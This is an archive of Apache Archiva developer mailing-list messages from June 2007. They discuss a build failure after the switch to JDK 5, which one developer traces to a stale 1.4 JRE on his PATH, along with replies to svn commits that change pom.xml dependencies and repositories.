[JPOX.Enhancer] - >> > > C:\Archiva\workspace\archiva\archiva-base\archiva-model\target > > \classes\org\apache\maven\archiva\model\package.jdo > >>> > > C:\Archiva\workspace\archiva\archiva-base\archiva-model\target > > \classes\org\apache\maven\archiva\model\package.jdo > > > > INFO [JPOX.Enhancer] - JPOX Enhancer : Using ClassEnhancer "BCEL" > > JPOX Enhancer : Using ClassEnhancer "BCEL" > > > > > > [ERROR] -------------------- > > [ERROR] Standard error from the JPox enhancer tool: > > [ERROR] -------------------- > > [ERROR] java.lang.UnsupportedClassVersionError: > > org/apache/maven/archiva/model/ArchivaRepositoryModel (Unsupported > > major.minor version 49.0) > > at java.lang.ClassLoader.defineClass0(Native Method) > > at java.lang.ClassLoader.defineClass(Unknown Source) > > at java.security.SecureClassLoader.defineClass(Unknown Source) > > at java.net.URLClassLoader.defineClass(Unknown Source) > > at java.net.URLClassLoader.access$100(Unknown Source) > > at java.net.URLClassLoader$1.run(Unknown Source) > > at java.security.AccessController.doPrivileged(Native Method) > > at java.net.URLClassLoader.findClass(Unknown Source) > > at java.lang.ClassLoader.loadClass(Unknown Source) > > at sun.misc.Launcher$AppClassLoader.loadClass(Unknown Source) > > at java.lang.ClassLoader.loadClass(Unknown Source) > > at org.jpox.JDOClassLoaderResolver.classOrNull( > > JDOClassLoaderResolver.java:510) > > at org.jpox.JDOClassLoaderResolver.classForName( > > JDOClassLoaderResolver.java:196) > > at org.jpox.JDOClassLoaderResolver.classForName( > > JDOClassLoaderResolver.java:362) > > at org.jpox.metadata.AbstractClassMetaData.loadClass( > > AbstractClassMetaData.java:524) > > at org.jpox.metadata.ClassMetaData.populate(ClassMetaData.java:215) > > at org.jpox.metadata.MetaDataManager.populateFileMetaData( > > MetaDataManager.java:1060) > > at > > org.jpox.enhancer.bcel.metadata.BCELMetaDataManager.populateRegistered > > File( > > BCELMetaDataManager.java:241) > > at org.jpox.enhancer.bcel.BCELUtils.getMetaDataForInput > > (BCELUtils.java > > :175) > > at org.jpox.enhancer.JPOXEnhancer.main(JPOXEnhancer.java:512) > > Exception in thread "main" > > > > [ERROR] -------------------- > > [INFO] > > ---------------------------------------------------------------------- > > -- > > [ERROR] BUILD ERROR > > [INFO] > > ---------------------------------------------------------------------- > > -- > > [INFO] The JPox enhancer tool exited with a non-null exit code. > > [INFO] > > ---------------------------------------------------------------------- > > -- > > > > ============================================================ > > > > > > On 6/19/07, Brett Porter <[email protected]> wrote: > >> > >> As in Continuum, I've made this change. I'm going with lazy consensus > >> - so if there are any objections please holler before dependent code > >> arrives :) > >> > >> On 19/06/2007, at 11:26 AM, [email protected] wrote: > >> > >> > Author: brett > >> > Date: Mon Jun 18 18:26:34 2007 > >> > New Revision: 548544 > >> > > >> > URL: http://svn.apache.org/viewvc?view=rev&rev=548544 > >> > Log: > >> > allow use of JDK 5 in Archiva > >> > > >> > Modified: > >> > maven/archiva/trunk/pom.xml > >> > > >> > Modified: maven/archiva/trunk/pom.xml > >> > URL: http://svn.apache.org/viewvc/maven/archiva/trunk/pom.xml? > >> > view=diff&rev=548544&r1=548543&r2=548544 > >> > > >> ===================================================================== > >> = > >> > ======== > >> > --- maven/archiva/trunk/pom.xml (original) > >> > +++ maven/archiva/trunk/pom.xml Mon Jun 18 18:26:34 2007 > >> > @@ -95,11 +95,31 @@ > >> > </execution> > >> > </executions> > >> > </plugin> > >> > +<!-- Doesn't work on Mac with Java 6 yet > >> > + <plugin> > >> > + <artifactId>maven-enforcer-plugin</artifactId> > >> > + <executions> > >> > + <execution> > >> > + <id>enforce-java</id> > >> > + <goals> > >> > + <goal>enforce-once</goal> > >> > + </goals> > >> > + <configuration> > >> > + <rules> > >> > + <requireJavaVersion> > >> > + <version>1.5.0</version> > >> > + </requireJavaVersion> > >> > + </rules> > >> > + </configuration> > >> > + </execution> > >> > + </executions> > >> > + </plugin> > >> > +--> > >> > <plugin> > >> > <artifactId>maven-compiler-plugin</artifactId> > >> > <configuration> > >> > - <source>1.4</source> > >> > - <target>1.4</target> > >> > + <source>1.5</source> > >> > + <target>1.5</target> > >> > </configuration> > >> > </plugin> > >> > <plugin> > >> > > >> > ------=_Part_48616_19956992.1182412404198-- From [email protected] Thu Jun 21 09:30:56 2007 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 52910 invoked from network); 21 Jun 2007 09:30:55 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 21 Jun 2007 09:30:55 -0000 Received: (qmail 75065 invoked by uid 500); 21 Jun 2007 09:30:59 -0000 Delivered-To: [email protected] Received: (qmail 74956 invoked by uid 500); 21 Jun 2007 09:30:58 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <archiva-dev.maven.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 74947 invoked by uid 99); 21 Jun 2007 09:30:58 -0000 Received: from herse.apache.org (HELO herse.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 21 Jun 2007 02:30:58 -0700 Received-SPF: pass (herse.apache.org: local policy) Received: from [161.129.204.104] (HELO webmail9.amenworld.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with SMTP; Thu, 21 Jun 2007 02:30:54 -0700 Received: (qmail 7691 invoked from network); 21 Jun 2007 09:30:35 -0000 Received: from 220.52.68-86.rev.gaoland.net (HELO ?161.129.204.104?) (161.129.204.104) by 0 with SMTP; 21 Jun 2007 09:30:35 -0000 Message-ID: <[email protected]> Date: Thu, 21 Jun 2007 11:30:08 +0200 From: Emmanuel Venisse <[email protected]> User-Agent: Thunderbird 161.129.204.104 (Windows/20070509) MIME-Version: 1.0 To: [email protected] Subject: Re: Use of JDK 5 in Archiva References: <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> In-Reply-To: <[email protected]> Content-Type: text/plain; charset=ISO-8859-1; format=flowed Content-Transfer-Encoding: 8bit X-Virus-Checked: Checked by ClamAV on apache.org It works fine for me. The difference I see is the OS (WinXP and OSX) Emmanuel Fabrice Bellingard a écrit : > Still the same problem running a "clean install" with the following > configuration: > - Win2k > - JDK 1.5.0_012 > - Maven 2.0.7 > > No one else has the same issue? > > Fabrice. > > On 6/21/07, Brett Porter <[email protected]> wrote: >> >> No problems here, or on the solaris zone. You ran with clean as well? >> >> I'd suggest upgrading your JDK if it really is _01 - that's pretty >> old :) >> >> - Brett >> >> On 20/06/2007, at 8:42 PM, Fabrice Bellingard wrote: >> >> > Hi Brett, >> > >> > I updated my workspace today and tried to build Archiva, and I get >> > an error >> > during JPOX enhancement, in the archiva-model module >> > (UnsupportedClassVersionError, see at the end of the mail for the >> > log). If I >> > use the last revision of the Archiva's root POM (that is, with >> > compiler set >> > to 1.4), then Archiva builds fine. >> > I'm using JDK 1.5.0_01 to run Maven. >> > >> > Any idea? >> > >> > Thanks, >> > Fabrice. >> > >> > ============================================================ >> > >> > INFO [JPOX.Enhancer] - JPOX Enhancer : Input Files >> > JPOX Enhancer : Input Files >> > INFO [JPOX.Enhancer] - >> >> > C:\Archiva\workspace\archiva\archiva-base\archiva-model\target >> > \classes\org\apache\maven\archiva\model\package.jdo >> >>> >> > C:\Archiva\workspace\archiva\archiva-base\archiva-model\target >> > \classes\org\apache\maven\archiva\model\package.jdo >> > >> > INFO [JPOX.Enhancer] - JPOX Enhancer : Using ClassEnhancer "BCEL" >> > JPOX Enhancer : Using ClassEnhancer "BCEL" >> > >> > >> > [ERROR] -------------------- >> > [ERROR] Standard error from the JPox enhancer tool: >> > [ERROR] -------------------- >> > [ERROR] java.lang.UnsupportedClassVersionError: >> > org/apache/maven/archiva/model/ArchivaRepositoryModel (Unsupported >> > major.minor version 49.0) >> > at java.lang.ClassLoader.defineClass0(Native Method) >> > at java.lang.ClassLoader.defineClass(Unknown Source) >> > at java.security.SecureClassLoader.defineClass(Unknown Source) >> > at java.net.URLClassLoader.defineClass(Unknown Source) >> > at java.net.URLClassLoader.access$100(Unknown Source) >> > at java.net.URLClassLoader$1.run(Unknown Source) >> > at java.security.AccessController.doPrivileged(Native Method) >> > at java.net.URLClassLoader.findClass(Unknown Source) >> > at java.lang.ClassLoader.loadClass(Unknown Source) >> > at sun.misc.Launcher$AppClassLoader.loadClass(Unknown Source) >> > at java.lang.ClassLoader.loadClass(Unknown Source) >> > at org.jpox.JDOClassLoaderResolver.classOrNull( >> > JDOClassLoaderResolver.java:510) >> > at org.jpox.JDOClassLoaderResolver.classForName( >> > JDOClassLoaderResolver.java:196) >> > at org.jpox.JDOClassLoaderResolver.classForName( >> > JDOClassLoaderResolver.java:362) >> > at org.jpox.metadata.AbstractClassMetaData.loadClass( >> > AbstractClassMetaData.java:524) >> > at org.jpox.metadata.ClassMetaData.populate(ClassMetaData.java:215) >> > at org.jpox.metadata.MetaDataManager.populateFileMetaData( >> > MetaDataManager.java:1060) >> > at >> > org.jpox.enhancer.bcel.metadata.BCELMetaDataManager.populateRegistered >> > File( >> > BCELMetaDataManager.java:241) >> > at org.jpox.enhancer.bcel.BCELUtils.getMetaDataForInput >> > (BCELUtils.java >> > :175) >> > at org.jpox.enhancer.JPOXEnhancer.main(JPOXEnhancer.java:512) >> > Exception in thread "main" >> > >> > [ERROR] -------------------- >> > [INFO] >> > ---------------------------------------------------------------------- >> > -- >> > [ERROR] BUILD ERROR >> > [INFO] >> > ---------------------------------------------------------------------- >> > -- >> > [INFO] The JPox enhancer tool exited with a non-null exit code. >> > [INFO] >> > ---------------------------------------------------------------------- >> > -- >> > >> > ============================================================ >> > >> > >> > On 6/19/07, Brett Porter <[email protected]> wrote: >> >> >> >> As in Continuum, I've made this change. I'm going with lazy consensus >> >> - so if there are any objections please holler before dependent code >> >> arrives :) >> >> >> >> On 19/06/2007, at 11:26 AM, [email protected] wrote: >> >> >> >> > Author: brett >> >> > Date: Mon Jun 18 18:26:34 2007 >> >> > New Revision: 548544 >> >> > >> >> > URL: http://svn.apache.org/viewvc?view=rev&rev=548544 >> >> > Log: >> >> > allow use of JDK 5 in Archiva >> >> > >> >> > Modified: >> >> > maven/archiva/trunk/pom.xml >> >> > >> >> > Modified: maven/archiva/trunk/pom.xml >> >> > URL: http://svn.apache.org/viewvc/maven/archiva/trunk/pom.xml? >> >> > view=diff&rev=548544&r1=548543&r2=548544 >> >> > >> >> ===================================================================== >> >> = >> >> > ======== >> >> > --- maven/archiva/trunk/pom.xml (original) >> >> > +++ maven/archiva/trunk/pom.xml Mon Jun 18 18:26:34 2007 >> >> > @@ -95,11 +95,31 @@ >> >> > </execution> >> >> > </executions> >> >> > </plugin> >> >> > +<!-- Doesn't work on Mac with Java 6 yet >> >> > + <plugin> >> >> > + <artifactId>maven-enforcer-plugin</artifactId> >> >> > + <executions> >> >> > + <execution> >> >> > + <id>enforce-java</id> >> >> > + <goals> >> >> > + <goal>enforce-once</goal> >> >> > + </goals> >> >> > + <configuration> >> >> > + <rules> >> >> > + <requireJavaVersion> >> >> > + <version>1.5.0</version> >> >> > + </requireJavaVersion> >> >> > + </rules> >> >> > + </configuration> >> >> > + </execution> >> >> > + </executions> >> >> > + </plugin> >> >> > +--> >> >> > <plugin> >> >> > <artifactId>maven-compiler-plugin</artifactId> >> >> > <configuration> >> >> > - <source>1.4</source> >> >> > - <target>1.4</target> >> >> > + <source>1.5</source> >> >> > + <target>1.5</target> >> >> > </configuration> >> >> > </plugin> >> >> > <plugin> >> >> > >> >> >> > From [email protected] Thu Jun 21 13:29:50 2007 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 60340 invoked from network); 21 Jun 2007 13:29:48 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 21 Jun 2007 13:29:48 -0000 Received: (qmail 74324 invoked by uid 500); 21 Jun 2007 13:29:52 -0000 Delivered-To: [email protected] Received: (qmail 74214 invoked by uid 500); 21 Jun 2007 13:29:51 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <archiva-dev.maven.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 74205 invoked by uid 99); 21 Jun 2007 13:29:51 -0000 Received: from herse.apache.org (HELO herse.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 21 Jun 2007 06:29:51 -0700 X-ASF-Spam-Status: No, hits=2.0 required=10.0 tests=HTML_MESSAGE,SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (herse.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO an-out-0708.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 21 Jun 2007 06:29:47 -0700 Received: by an-out-0708.google.com with SMTP id d30so128143and for <[email protected]>; Thu, 21 Jun 2007 06:29:26 -0700 (PDT) DKIM-Signature: a=rsa-sha1; c=relaxed/relaxed; d=gmail.com; s=beta; h=domainkey-signature:received:received:message-id:date:from:to:subject:in-reply-to:mime-version:content-type:references; b=R1gtkpD3yPHMzX1O9X3MOCFLJh9SkthUsdB73nfbXbEmvvrZ1V1Sx1l+JWpRuZx5MFchG4c9isvjeqn1SVmux8zFcLewKcshks7RSlGe22usCxCWZHhN4sU2S47F5/c+zXl0ItmiZloHBwZ7iGtof+U/gqZgmoPGWQwovMWxitg= DomainKey-Signature: a=rsa-sha1; c=nofws; d=gmail.com; s=beta; h=received:message-id:date:from:to:subject:in-reply-to:mime-version:content-type:references; b=OpY488k3xKxjncwJhKc2kjR0u4nMuqtDoDixKcyAbGhWy5jCvYKxTZmbqGFC3HB6XsWgCeXGiKqiGr0r87tLbnNEueUhbFhhybrTA0zMloiqxKyZYRJfE24/FHWOQxQpWFcU0yvwMVdOJNOaGFXOWBM+U0fQYjg1AG2LxdVvluc= Received: by 161.129.204.104 with SMTP id o8mr1090637ano.1182432565612; Thu, 21 Jun 2007 06:29:25 -0700 (PDT) Received: by 161.129.204.104 with HTTP; Thu, 21 Jun 2007 06:29:25 -0700 (PDT) Message-ID: <[email protected]> Date: Thu, 21 Jun 2007 15:29:25 +0200 From: "Fabrice Bellingard" <[email protected]> To: [email protected] Subject: Re: Use of JDK 5 in Archiva In-Reply-To: <[email protected]> MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----=_Part_52545_18703136.1182432565566" References: <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org ------=_Part_52545_18703136.1182432565566 Content-Type: text/plain; charset=ISO-8859-1; format=flowed Content-Transfer-Encoding: quoted-printable Content-Disposition: inline I found the problem: for other purposes, I had modified the %PATH% variable to point to a 1.4.x JRE bin folder. So even if my JAVA_HOME was pointing to a 1.5 SDK, there was a problem with the JPOX plugin because it seems that i= t launches a "java ..." command in a new process... so JPOX was running on a 1.4 JVM. Now, everything works fine. Whew!! :-) Fabrice. On 6/21/07, Emmanuel Venisse <[email protected]> wrote: > > It works fine for me. The difference I see is the OS (WinXP and OSX) > > Emmanuel > > Fabrice Bellingard a =E9crit : > > Still the same problem running a "clean install" with the following > > configuration: > > - Win2k > > - JDK 1.5.0_012 > > - Maven 2.0.7 > > > > No one else has the same issue? > > > > Fabrice. > > > > On 6/21/07, Brett Porter <[email protected]> wrote: > >> > >> No problems here, or on the solaris zone. You ran with clean as well? > >> > >> I'd suggest upgrading your JDK if it really is _01 - that's pretty > >> old :) > >> > >> - Brett > >> > >> On 20/06/2007, at 8:42 PM, Fabrice Bellingard wrote: > >> > >> > Hi Brett, > >> > > >> > I updated my workspace today and tried to build Archiva, and I get > >> > an error > >> > during JPOX enhancement, in the archiva-model module > >> > (UnsupportedClassVersionError, see at the end of the mail for the > >> > log). If I > >> > use the last revision of the Archiva's root POM (that is, with > >> > compiler set > >> > to 1.4), then Archiva builds fine. > >> > I'm using JDK 1.5.0_01 to run Maven. > >> > > >> > Any idea? > >> > > >> > Thanks, > >> > Fabrice. > >> > > >> > =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D > >> > > >> > INFO [JPOX.Enhancer] - JPOX Enhancer : Input Files > >> > JPOX Enhancer : Input Files > >> > INFO [JPOX.Enhancer] - >> > >> > C:\Archiva\workspace\archiva\archiva-base\archiva-model\target > >> > \classes\org\apache\maven\archiva\model\package.jdo > >> >>> > >> > C:\Archiva\workspace\archiva\archiva-base\archiva-model\target > >> > \classes\org\apache\maven\archiva\model\package.jdo > >> > > >> > INFO [JPOX.Enhancer] - JPOX Enhancer : Using ClassEnhancer "BCEL" > >> > JPOX Enhancer : Using ClassEnhancer "BCEL" > >> > > >> > > >> > [ERROR] -------------------- > >> > [ERROR] Standard error from the JPox enhancer tool: > >> > [ERROR] -------------------- > >> > [ERROR] java.lang.UnsupportedClassVersionError: > >> > org/apache/maven/archiva/model/ArchivaRepositoryModel (Unsupported > >> > major.minor version 49.0) > >> > at java.lang.ClassLoader.defineClass0(Native Method) > >> > at java.lang.ClassLoader.defineClass(Unknown Source) > >> > at java.security.SecureClassLoader.defineClass(Unknown Source) > >> > at java.net.URLClassLoader.defineClass(Unknown Source) > >> > at java.net.URLClassLoader.access$100(Unknown Source) > >> > at java.net.URLClassLoader$1.run(Unknown Source) > >> > at java.security.AccessController.doPrivileged(Native Method) > >> > at java.net.URLClassLoader.findClass(Unknown Source) > >> > at java.lang.ClassLoader.loadClass(Unknown Source) > >> > at sun.misc.Launcher$AppClassLoader.loadClass(Unknown Source) > >> > at java.lang.ClassLoader.loadClass(Unknown Source) > >> > at org.jpox.JDOClassLoaderResolver.classOrNull( > >> > JDOClassLoaderResolver.java:510) > >> > at org.jpox.JDOClassLoaderResolver.classForName( > >> > JDOClassLoaderResolver.java:196) > >> > at org.jpox.JDOClassLoaderResolver.classForName( > >> > JDOClassLoaderResolver.java:362) > >> > at org.jpox.metadata.AbstractClassMetaData.loadClass( > >> > AbstractClassMetaData.java:524) > >> > at org.jpox.metadata.ClassMetaData.populate(ClassMetaData.java > :215) > >> > at org.jpox.metadata.MetaDataManager.populateFileMetaData( > >> > MetaDataManager.java:1060) > >> > at > >> > > org.jpox.enhancer.bcel.metadata.BCELMetaDataManager.populateRegistered > >> > File( > >> > BCELMetaDataManager.java:241) > >> > at org.jpox.enhancer.bcel.BCELUtils.getMetaDataForInput > >> > (BCELUtils.java > >> > :175) > >> > at org.jpox.enhancer.JPOXEnhancer.main(JPOXEnhancer.java:512) > >> > Exception in thread "main" > >> > > >> > [ERROR] -------------------- > >> > [INFO] > >> > > ---------------------------------------------------------------------- > >> > -- > >> > [ERROR] BUILD ERROR > >> > [INFO] > >> > > ---------------------------------------------------------------------- > >> > -- > >> > [INFO] The JPox enhancer tool exited with a non-null exit code. > >> > [INFO] > >> > > ---------------------------------------------------------------------- > >> > -- > >> > > >> > =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D > >> > > >> > > >> > On 6/19/07, Brett Porter <[email protected]> wrote: > >> >> > >> >> As in Continuum, I've made this change. I'm going with lazy > consensus > >> >> - so if there are any objections please holler before dependent cod= e > >> >> arrives :) > >> >> > >> >> On 19/06/2007, at 11:26 AM, [email protected] wrote: > >> >> > >> >> > Author: brett > >> >> > Date: Mon Jun 18 18:26:34 2007 > >> >> > New Revision: 548544 > >> >> > > >> >> > URL: http://svn.apache.org/viewvc?view=3Drev&rev=3D548544 > >> >> > Log: > >> >> > allow use of JDK 5 in Archiva > >> >> > > >> >> > Modified: > >> >> > maven/archiva/trunk/pom.xml > >> >> > > >> >> > Modified: maven/archiva/trunk/pom.xml > >> >> > URL: http://svn.apache.org/viewvc/maven/archiva/trunk/pom.xml? > >> >> > view=3Ddiff&rev=3D548544&r1=3D548543&r2=3D548544 > >> >> > > >> >> > =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D > >> >> =3D > >> >> > =3D=3D=3D=3D=3D=3D=3D=3D > >> >> > --- maven/archiva/trunk/pom.xml (original) > >> >> > +++ maven/archiva/trunk/pom.xml Mon Jun 18 18:26:34 2007 > >> >> > @@ -95,11 +95,31 @@ > >> >> > </execution> > >> >> > </executions> > >> >> > </plugin> > >> >> > +<!-- Doesn't work on Mac with Java 6 yet > >> >> > + <plugin> > >> >> > + <artifactId>maven-enforcer-plugin</artifactId> > >> >> > + <executions> > >> >> > + <execution> > >> >> > + <id>enforce-java</id> > >> >> > + <goals> > >> >> > + <goal>enforce-once</goal> > >> >> > + </goals> > >> >> > + <configuration> > >> >> > + <rules> > >> >> > + <requireJavaVersion> > >> >> > + <version>1.5.0</version> > >> >> > + </requireJavaVersion> > >> >> > + </rules> > >> >> > + </configuration> > >> >> > + </execution> > >> >> > + </executions> > >> >> > + </plugin> > >> >> > +--> > >> >> > <plugin> > >> >> > <artifactId>maven-compiler-plugin</artifactId> > >> >> > <configuration> > >> >> > - <source>1.4</source> > >> >> > - <target>1.4</target> > >> >> > + <source>1.5</source> > >> >> > + <target>1.5</target> > >> >> > </configuration> > >> >> > </plugin> > >> >> > <plugin> > >> >> > > >> >> > >> > > > > ------=_Part_52545_18703136.1182432565566-- From [email protected] Fri Jun 22 03:12:46 2007 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 29662 invoked from network); 22 Jun 2007 03:12:44 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 22 Jun 2007 03:12:44 -0000 Received: (qmail 83362 invoked by uid 500); 22 Jun 2007 03:12:48 -0000 Delivered-To: [email protected] Received: (qmail 83247 invoked by uid 500); 22 Jun 2007 03:12:47 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <archiva-dev.maven.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 83238 invoked by uid 99); 22 Jun 2007 03:12:47 -0000 Received: from herse.apache.org (HELO herse.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 21 Jun 2007 20:12:47 -0700 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received-SPF: neutral (herse.apache.org: local policy) Received: from [161.129.204.104] (HELO mx06.syd.iprimus.net.au) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 21 Jun 2007 20:12:26 -0700 X-IronPort-Anti-Spam-Filtered: true X-IronPort-Anti-Spam-Result: AgAAAHTaekY6sgN0/2dsb2JhbAAN X-IronPort-AV: E=Sophos;i="4.16,449,1175436000"; d="scan'208";a="52641035" Received: from 116.075.dsl.syd.iprimus.net.au (HELO [161.129.204.104]) ([161.129.204.104]) by smtp06.syd.iprimus.net.au with ESMTP; 22 Jun 2007 13:12:01 +1000 Mime-Version: 1.0 (Apple Message framework v752.3) In-Reply-To: <[email protected]> References: <[email protected]> Content-Type: text/plain; charset=US-ASCII; delsp=yes; format=flowed Message-Id: <[email protected]> Content-Transfer-Encoding: 7bit From: Brett Porter <[email protected]> Subject: Re: svn commit: r549512 - /maven/archiva/trunk/pom.xml Date: Fri, 22 Jun 2007 13:11:58 +1000 To: [email protected] X-Mailer: Apple Mail (2.752.3) X-Virus-Checked: Checked by ClamAV on apache.org The repository defn shouldn't be needed (it gets synced to central). On 22/06/2007, at 1:24 AM, [email protected] wrote: > Author: joakime > Date: Thu Jun 21 08:24:14 2007 > New Revision: 549512 > > URL: http://svn.apache.org/viewvc?view=rev&rev=549512 > Log: > Updating to released version plexus-webdav > > Modified: > maven/archiva/trunk/pom.xml > > Modified: maven/archiva/trunk/pom.xml > URL: http://svn.apache.org/viewvc/maven/archiva/trunk/pom.xml? > view=diff&rev=549512&r1=549511&r2=549512 > ====================================================================== > ======== > --- maven/archiva/trunk/pom.xml (original) > +++ maven/archiva/trunk/pom.xml Thu Jun 21 08:24:14 2007 > @@ -83,13 +83,10 @@ > <repositories> > <repository> > <id>codehaus.org</id> > - <url>http://snapshots.repository.codehaus.org</url> > + <url>http://repository.codehaus.org</url> > <releases> > - <enabled>false</enabled> > - </releases> > - <snapshots> > <enabled>true</enabled> > - </snapshots> > + </releases> > </repository> > </repositories> > <build> > @@ -616,7 +613,7 @@ > <dependency> > <groupId>org.codehaus.plexus.webdav</groupId> > <artifactId>plexus-webdav-simple</artifactId> > - <version>1.0-alpha-3-SNAPSHOT</version> > + <version>1.0-alpha-3</version> > </dependency> > <dependency> > <groupId>javax.servlet</groupId> > From [email protected] Fri Jun 22 03:15:42 2007 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 31304 invoked from network); 22 Jun 2007 03:15:39 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 22 Jun 2007 03:15:39 -0000 Received: (qmail 90134 invoked by uid 500); 22 Jun 2007 03:15:43 -0000 Delivered-To: [email protected] Received: (qmail 90097 invoked by uid 500); 22 Jun 2007 03:15:42 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <archiva-dev.maven.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 90088 invoked by uid 99); 22 Jun 2007 03:15:42 -0000 Received: from herse.apache.org (HELO herse.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 21 Jun 2007 20:15:42 -0700 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received-SPF: neutral (herse.apache.org: local policy) Received: from [161.129.204.104] (HELO mx06.syd.iprimus.net.au) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 21 Jun 2007 20:15:23 -0700 X-IronPort-Anti-Spam-Filtered: true X-IronPort-Anti-Spam-Result: AgAAAAvcekY6sgN0/2dsb2JhbAAN X-IronPort-AV: E=Sophos;i="4.16,449,1175436000"; d="scan'208";a="52641488" Received: from 116.075.dsl.syd.iprimus.net.au (HELO [161.129.204.104]) ([161.129.204.104]) by smtp06.syd.iprimus.net.au with ESMTP; 22 Jun 2007 13:14:21 +1000 Mime-Version: 1.0 (Apple Message framework v752.3) In-Reply-To: <[email protected]> References: <[email protected]> Content-Type: text/plain; charset=US-ASCII; delsp=yes; format=flowed Message-Id: <[email protected]> Content-Transfer-Encoding: 7bit From: Brett Porter <[email protected]> Subject: Re: svn commit: r549579 - in /maven/archiva/trunk/maven-meeper: ./ src/main/ src/main/java/ src/main/java/org/ src/main/java/org/apache/ src/main/java/org/apache/maven/ src/main/java/org/apache/maven/archiva/ src/main/java/org/apache/maven/archiva/meeper/ ... Date: Fri, 22 Jun 2007 13:14:17 +1000 To: [email protected] X-Mailer: Apple Mail (2.752.3) X-Virus-Checked: Checked by ClamAV on apache.org You broke the build (commons-csv isn't published in a listed repository) On 22/06/2007, at 4:27 AM, [email protected] wrote: > Author: carlos > Date: Thu Jun 21 11:27:33 2007 > New Revision: 549579 > > URL: http://svn.apache.org/viewvc?view=rev&rev=549579 > Log: > Add some code for a possible implementation for syncing > repositories using only one file with the data > > Added: > maven/archiva/trunk/maven-meeper/src/main/ > maven/archiva/trunk/maven-meeper/src/main/java/ > maven/archiva/trunk/maven-meeper/src/main/java/org/ > maven/archiva/trunk/maven-meeper/src/main/java/org/apache/ > maven/archiva/trunk/maven-meeper/src/main/java/org/apache/maven/ > maven/archiva/trunk/maven-meeper/src/main/java/org/apache/maven/ > archiva/ > maven/archiva/trunk/maven-meeper/src/main/java/org/apache/maven/ > archiva/meeper/ > maven/archiva/trunk/maven-meeper/src/main/java/org/apache/maven/ > archiva/meeper/Reader.java (with props) > maven/archiva/trunk/maven-meeper/src/main/java/org/apache/maven/ > archiva/meeper/SyncedRepository.java (with props) > maven/archiva/trunk/maven-meeper/src/main/resources/ > maven/archiva/trunk/maven-meeper/src/test/ > maven/archiva/trunk/maven-meeper/src/test/java/ > maven/archiva/trunk/maven-meeper/src/test/java/org/ > maven/archiva/trunk/maven-meeper/src/test/java/org/apache/ > maven/archiva/trunk/maven-meeper/src/test/java/org/apache/maven/ > maven/archiva/trunk/maven-meeper/src/test/java/org/apache/maven/ > archiva/ > maven/archiva/trunk/maven-meeper/src/test/java/org/apache/maven/ > archiva/meeper/ > maven/archiva/trunk/maven-meeper/src/test/java/org/apache/maven/ > archiva/meeper/ReaderTest.java (with props) > maven/archiva/trunk/maven-meeper/src/test/resources/ > maven/archiva/trunk/maven-meeper/src/test/resources/org/ > 